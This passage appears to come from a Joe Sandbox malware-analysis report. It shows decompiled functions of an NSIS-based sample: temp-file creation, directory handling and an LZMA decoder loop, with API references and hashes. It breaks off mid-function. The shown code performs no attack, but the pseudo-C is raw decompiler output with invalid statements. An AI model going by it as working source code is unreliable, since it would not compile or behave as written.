0x0040608a
0x00406092
0x00000000
0x00000000
0x00000000
0x00000000
0x0040608a
0x004060a2
0x004060a8
0x00000000
0x004060b6
0x0040606f
0x00406075
0x00000000
0x00000000
0x00000000
0x00000000
0x00406075
0x0040605c
0x00000000

APIs

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4.v..v,?,762E2EE0,00405D94,?,762E3420,762E2EE0,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4.v..v,?,762E2EE0,00405D94,?,762E3420,762E2EE0,00000000), ref: 00406098
GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4.v..v,?,762E2EE0,00405D94,?,762E3420,762E2EE0), ref: 004060A8

Strings

P_B, xrefs: 00406045
4.v..v, xrefs: 00406041

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4.v..v$P_B
API String ID: 3248276644-316983328
Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E

Uniqueness

Uniqueness Score: -1.00%

Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040618d
0x00406193
0x00406194
0x00406194
0x00406199
0x0040619a
0x0040619d
0x004061a2
0x004061a5
0x004061af
0x004061bc
0x004061c0
0x004061c8
0x00000000
0x00000000
0x004061cc
0x00000000
0x004061ce
0x004061ce
0x004061ce
0x004061d1
0x004061d4
0x004061d4
0x004061d7
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004061A5
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0

Strings

nsa, xrefs: 00406194
C:\Users\user\AppData\Local\Temp\, xrefs: 0040618C

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4.v..v,?,762E2EE0,00405D94,?,762E3420,762E2EE0,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-670666241
Opcode ID: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
Opcode Fuzzy Hash: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
